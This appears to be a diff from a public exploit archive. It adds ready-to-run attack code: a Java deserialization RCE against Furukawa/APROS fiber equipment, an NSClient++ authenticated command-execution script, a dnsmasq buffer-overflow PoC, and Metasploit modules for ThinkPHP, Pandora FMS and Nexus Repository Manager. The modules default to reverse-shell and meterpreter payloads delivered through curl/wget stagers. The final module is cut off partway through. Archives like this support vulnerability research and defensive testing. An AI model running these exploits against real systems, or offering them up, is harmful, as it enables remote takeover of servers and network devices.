payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72"
payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F"
payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73"
payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72"
payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E"
payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73"
payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00"
payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70"
payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C"
payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E"
payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D"
payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69"
payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72"
payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69"
payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72"
payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D"
payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66"
payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72"
payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38"
payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A"
payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C"
payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C"
payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B"
payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12"
payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73"
payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E"
payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C"
payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75"
payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C"
payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A"
payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D"
payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00"
payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00"
payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69"
payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63"
payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00"
payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61"
payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2"
payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################"
payload += (bytes(self.cmd, "utf-8"))############################################"
payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01"
payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61"
payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2"
payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65"
payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D"
payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00"
payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E"
payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00"
payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09"
payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00"
payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######"
jbits = BytesIO()
with gzip.GzipFile(fileobj=jbits, mode="wb") as f:
f.write(payload)
serialize = base64.b64encode(jbits.getvalue())
print("[*] Sending serialized object")
self.headers = {
"Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",
"Content-Type" : "application/x-www-form-urlencoded",
"User-Agent" : "ISP-Eye/2.51",
"Connection" : "keep-alive"}
self.paramz={"javax.faces.ViewState" : serialize}
#sleep(1)
r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)
def par(self):
if len(sys.argv) != 4:
self.usage()
else:
self.target = sys.argv[1]
self.callback = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.target:
self.target = "http://{}".format(self.target)
def check(self):
print("[*] Setting up valid URL path")
try:
r = requests.get(self.target)
app = r.text
if not "FURUKAWA" in app and not "APROS" in app:
print("[!] App not detected.")
exit(0)
if "FURUKAWA" in app:
self.path = "/FURUKAWA/"
elif "APROS" in app:
self.path = "/APROS/"
else:
exit(-1337)
except Exception as p:
print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
exit(0)
def framed(self):
naslov = """
o===--------------------------------------===o
| |
| Furukawa Electric / Tecnored |
| APROS Evolution | FURUKAWA | ConsciusMAP |
| Fiber-To-The-Home (FTTH) |
| |
| Java Deserialization Remote Code Execution |
| ZSL-2020-5565 |
| |
o===--------------------------------------===o
||
||
(\__/)||
(•ㅅ•)||
/   づ|
"""
print(naslov)
def usage(self):
self.framed()
print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>")
print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n")
exit(0)
def main(self):
self.par()########()
self.check()######()
self.thricer()####()
if __name__ == '__main__':
Optics().main()

192
exploits/json/webapps/48360.txt Normal file
View file

@ -0,0 +1,192 @@
# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
# Default, this leads to privileged code execution.
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs
import urllib3
import json
import sys
import random
import string
import time
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generateName():
letters = string.ascii_lowercase + string.ascii_uppercase
return ''.join(random.choice(letters) for i in range(random.randint(8,13)))
def printStatus(message, msg_type):
C_YELLOW = '\033[1;33m'
C_RESET = '\033[0m'
C_GREEN = '\033[1;32m'
C_RED = '\033[1;31m'
if msg_type == "good":
green_plus = C_GREEN + "[+]" + C_RESET
string = green_plus + " " + message
elif msg_type == "info":
yellow_ex = C_YELLOW + "[!]" + C_RESET
string = yellow_ex + " " + message
elif msg_type == "bad":
red_minus = C_RED + "[-]" + C_RESET
string = red_minus + " " + message
print(string)
# This function adds a new external script containing the desired
# command, then saves the configuration
def configurePayload(session, cmd, key):
printStatus("Configuring Script with Specified Payload . . .", "info")
endpoint = "/settings/query.json"
node = { "path" : "/settings/external scripts/scripts",
"key" : key }
value = { "string_data" : cmd }
update = { "node" : node , "value" : value }
payload = [ { "plugin_id" : "1234",
"update" : update } ]
json_data = { "type" : "SettingsRequestMessage", "payload" : payload }
out = session.post(url = base_url + endpoint, json=json_data, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
sys.exit(1)
printStatus("Added External Script (name: " + key + ")", "good")
time.sleep(3)
printStatus("Saving Configuration . . .", "info")
header = { "version" : "1" }
payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }
session.post(url = base_url + endpoint, json=json_data, verify=False)
# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
def reloadConfig(session):
printStatus("Reloading Application . . .", "info")
endpoint = "/core/reload"
session.get(url = base_url + endpoint, verify=False)
# Wait until the application successfully reloads by making a request
# every 10 seconds until it responds.
printStatus("Waiting for Application to reload . . .", "info")
time.sleep(10)
response = False
count = 0
while not response:
try:
out = session.get(url = base_url, verify=False, timeout=10)
if len(out.content) > 0:
response = True
except:
count += 1
if count > 10:
printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
sys.exit(1)
else:
continue
# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session, key):
printStatus("Triggering payload, should execute shortly . . .", "info")
endpoint = "/query/" + key
try:
session.get(url = base_url + endpoint, verify=False, timeout=10)
except requests.exceptions.ReadTimeout:
printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
sys.exit(0)
# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session):
printStatus("Enabling External Scripts Module . . .", "info")
endpoint = "/registry/control/module/load"
params = { "name" : "CheckExternalScripts" }
out = session.get(url = base_url + endpoint, params=params, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
sys.exit(1)
# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session):
printStatus("Obtaining Authentication Token . . .", "info")
endpoint = "/auth/token"
params = { "password" : password }
auth = session.get(url = base_url + endpoint, params=params, verify=False)
if "auth token" in str(auth.content):
j = json.loads(auth.content)
authToken = j["auth token"]
printStatus("Got auth token: " + authToken, "good")
return authToken
else:
printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
sys.exit(1)
parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
args = parser.parse_args()
if len(sys.argv) < 4:
parser.print_help()
sys.exit(1)
# Build base URL, grab needed arguments
base_url = "https://" + args.t + ":" + args.P
printStatus("Targeting base URL " + base_url, "info")
password = args.p
cmd = args.c
# Get first auth token, and add it to headers of session
s = requests.session()
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Generate a random name, enable the feature, add the payload,
# then reload.
randKey = generateName()
enableFeature(s)
configurePayload(s, cmd, randKey)
reloadConfig(s)
# Since application was reloaded, need a new auth token.
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Execute our code.
triggerPayload(s, randKey)

38
exploits/linux/dos/48301.py Executable file
View file

@ -0,0 +1,38 @@
# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
# Date: 2020-04-06
# Exploit Author: Josue Encinar
# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
# Version: 2.79
# Tested on: Ubuntu 18.04
from subprocess import Popen, PIPE
data = ""
bof = False
for i in range (1, 200):
A = "A"*i
data = f"dhcp_release {A} 1 1"
try:
result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
error = result.stderr.read().decode()
if "Aborted (core dumped)" in error:
print("[+] Buffer Overflow detected!")
print(f"[*] Offset: {i}")
bof = True
break
except Exception as e:
print(f"[-] {e}")
if not bof:
print("[-] No buffer overflow...")
## Check line 273 in dhcp_release.c
### strcpy(ifr.ifr_name, argv[1]);
#
## PoC:
# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
# *** buffer overflow detected ***: dhcp_release terminated
# [+] Buffer Overflow detected!
# [*] Offset: 16

2
exploits/linux/local/40953.sh
View file

@ -2,7 +2,7 @@
#
# Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
# Google Dork: vesta control panel inurl:8083
# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
# Exploit Author: Jaka Hudoklin @offlinehacker
# Vendor Homepage: http://vestacp.com/
# Software Link: https://github.com/serghey-rodin/vesta
# Version: 0.9.7 - 0.9.8-16

274
exploits/linux/remote/48333.rb Executable file
View file

@ -0,0 +1,274 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
'Description' => %q{
This module exploits one of two PHP injection vulnerabilities in the
ThinkPHP web framework to execute code as the web user.
Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
vulnerable to a separate vulnerability. The module will automatically
attempt to detect the version of the software.
Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
},
'Author' => [
# Discovery by unknown threaty threat actors
'wvu' # Module
],
'References' => [
# https://www.google.com/search?q=thinkphp+rce, tbh
['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP
['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
],
'DisclosureDate' => '2018-12-10', # Unknown discovery date
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
register_advanced_options([
# NOTE: You may want to tweak this for long-running commands like find(1)
OptFloat.new('CmdOutputTimeout',
[true, 'Timeout for cmd/unix/generic output', 3.5])
])
# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end
=begin
wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=1353 HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Date: Mon, 13 Apr 2020 06:42:15 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Content-Length: 7332
< Content-Type: text/html; charset=utf-8
<
{ [7332 bytes data]
* Connection #0 to host 127.0.0.1 left intact
5.0.20wvu@kharak:~$
=end
def check
# An unknown route will trigger the ThinkPHP copyright with version
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {'s' => rand_text_alpha(8..42)}
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
return CheckCode::Unknown(
'Target did not respond with ThinkPHP copyright.'
)
end
# Get the first copyright <span> containing the version
version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text
unless (version = version.scan(/^V([\d.]+)$/).flatten.first)
return CheckCode::Detected(
'Target did not respond with ThinkPHP version.'
)
end
# Make the parsed version a comparable ivar for automatic exploitation
@version = Gem::Version.new(version)
if @version <= Gem::Version.new('5.0.23')
return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
end
CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
# This is just extra insurance in case I screwed up the check method
unless @version
fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
end
print_status("Targeting ThinkPHP #{@version} automatically")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
# XXX: Only opts[:noconcat] may induce responses from the server
execute_cmdstager
else # This is just extra insurance in case I screwed up the info hash
fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
end
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
if @version < Gem::Version.new('5.0.23')
exploit_less_than_5_0_23(cmd)
elsif @version == Gem::Version.new('5.0.23')
exploit_5_0_23(cmd)
else # This is just extra insurance in case I screwed up the exploit method
fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
end
end
=begin
wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:43:45 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
def exploit_less_than_5_0_23(cmd)
# XXX: The server may block on executing our payload and won't respond
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
's' => '/Index/\\think\\app/invokefunction',
'function' => 'call_user_func_array',
'vars[0]' => 'system', # TODO: Debug ARCH_PHP
'vars[1][]' => cmd
},
'partial' => true
}, datastore['CmdOutputTimeout'])
return unless res && res.code == 200
vprint_good("Successfully executed command: #{cmd}")
return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
# HACK: Print half of the doubled-up command output
vprint_line(res.body[0, res.body.length / 2])
end
=begin
wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
> POST /index.php?s=captcha HTTP/1.1
> Host: 127.0.0.1:8081
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 72
> Content-Type: application/x-www-form-urlencoded
>
} [72 bytes data]
* upload completely sent off: 72 out of 72 bytes
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:44:05 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.12
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
def exploit_5_0_23(cmd)
# XXX: The server may block on executing our payload and won't respond
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {'s' => 'captcha'},
'vars_post' => {
'_method' => '__construct',
'filter[]' => 'system', # TODO: Debug ARCH_PHP
'method' => 'get',
'server[REQUEST_METHOD]' => cmd
},
'partial' => true
}, datastore['CmdOutputTimeout'])
return unless res && res.code == 200
vprint_good("Successfully executed command: #{cmd}")
return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
# Clean up output from cmd/unix/generic
vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
end
end

142
exploits/linux/remote/48334.rb Executable file
View file

@ -0,0 +1,142 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Pandora FMS Ping Authenticated Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.
},
'Author' =>
[
'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
],
'DisclosureDate' => '2020-03-09',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' =>
[
['Automatic Target', {}]
],
'DefaultOptions' =>
{
'Payload' => 'linux/x86/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
]
)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'index.php')
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.body =~ /Pandora/i
return CheckCode::Safe
end
pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first
version = Gem::Version.new(pandora_version)
print_status("Pandora FMS version #{version}") if version
if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
return Exploit::CheckCode::Appears
end
CheckCode::Detected
end
def authenticate
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'index.php'),
'vars_get' => {
'login' => '1'
},
'vars_post' => {
'nick' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'login_button' => 'Login'
}
})
return auth_succeeded?(res)
end
def auth_succeeded?(res)
unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
print_error('Authentication failed!')
return false
end
print_good('Successfully authenticated')
print_status('Attempting to retrieve session cookie')
@cookie = res.get_cookies
unless @cookie.include?('PHPSESSID')
print_error('Error retrieving cookie!')
return false
end
print_good("Successfully retrieved session cookie: #{@cookie}")
true
end
def exploit
print_status('Exploiting...')
execute_cmdstager(flavor: :wget, nospace: true)
end
def execute_command(cmd, opts = {})
print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
auth = authenticate
unless auth
fail_with Failure::NoAccess, 'Please provide a valid username and password.'
end
id_agente = 1
while !session_created? && id_agente <= 10
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'index.php'),
'cookie' => @cookie,
'vars_get' => {
'sec' => 'estado',
'sec2' => 'operation/agentes/ver_agente',
'tab' => 'extension',
'id_agente' => "#{id_agente}",
'id_extension' => 'network_tools'
},
'vars_post' => {
'operation' => '2',
'select_ips' => ";#{cmd}",
'community' => 'public',
'submit' => 'Execute'
}
})
id_agente += 1
end
end
end

196
exploits/linux/remote/48343.rb Executable file
View file

@ -0,0 +1,196 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Nexus Repository Manager Java EL Injection RCE',
'Description' => %q{
This module exploits a Java Expression Language (EL) injection in Nexus
Repository Manager versions up to and including 3.21.1 to execute code
as the Nexus user.
This is a post-authentication vulnerability, so credentials are required
to exploit the bug. Any user regardless of privilege level may be used.
Tested against 3.21.1-01.
},
'Author' => [
'Alvaro Muñoz', # Discovery
'wvu' # Module
],
'References' => [
['CVE', '2020-10199'],
['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],
['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']
],
'DisclosureDate' => '2020-03-31', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},
'CmdStagerFlavor' => %i[curl wget],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(8081),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Nexus username', 'admin']),
OptString.new('PASSWORD', [true, 'Nexus password'])
])
end
def post_auth?
# Pre-auth RCE? https://twitter.com/iamnoooob/status/1246182773427240967
true
end
# Send a GET / request to the server, check the response for a Server header
# containing the Nexus version, and then check if it's a vulnerable version
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.headers['Server']
return CheckCode::Unknown('Target did not respond with Server header.')
end
# Example Server header:
# Server: Nexus/3.21.1-01 (OSS)
version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first
unless version
return CheckCode::Unknown('Target did not respond with Nexus version.')
end
if Gem::Version.new(version) <= Gem::Version.new('3.21.1')
return CheckCode::Appears("Nexus #{version} is a vulnerable version.")
end
CheckCode::Safe("Nexus #{version} is NOT a vulnerable version.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
print_status("Executing command stager for #{datastore['PAYLOAD']}")
# This will drop a binary payload to disk and execute it!
execute_cmdstager(
noconcat: true,
cookie: login(datastore['USERNAME'], datastore['PASSWORD'])
)
end
def login(username, password)
print_status("Logging in with #{username}:#{password}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/service/rapture/session'),
'vars_post' => {
'username' => Rex::Text.encode_base64(username),
'password' => Rex::Text.encode_base64(password)
},
'partial' => true # XXX: Return partial response despite timeout
}, 3.5)
unless res
fail_with(Failure::Unknown, 'Target did not respond to login request')
end
cookie = res.get_cookies
unless res.code == 204 && cookie.match(/NXSESSIONID=[\h-]+/)
fail_with(Failure::NoAccess, 'Could not log in with specified creds')
end
print_good("Logged in with #{cookie}")
cookie
end
# This is defined so that CmdStager can use it!
def execute_command(cmd, opts = {})
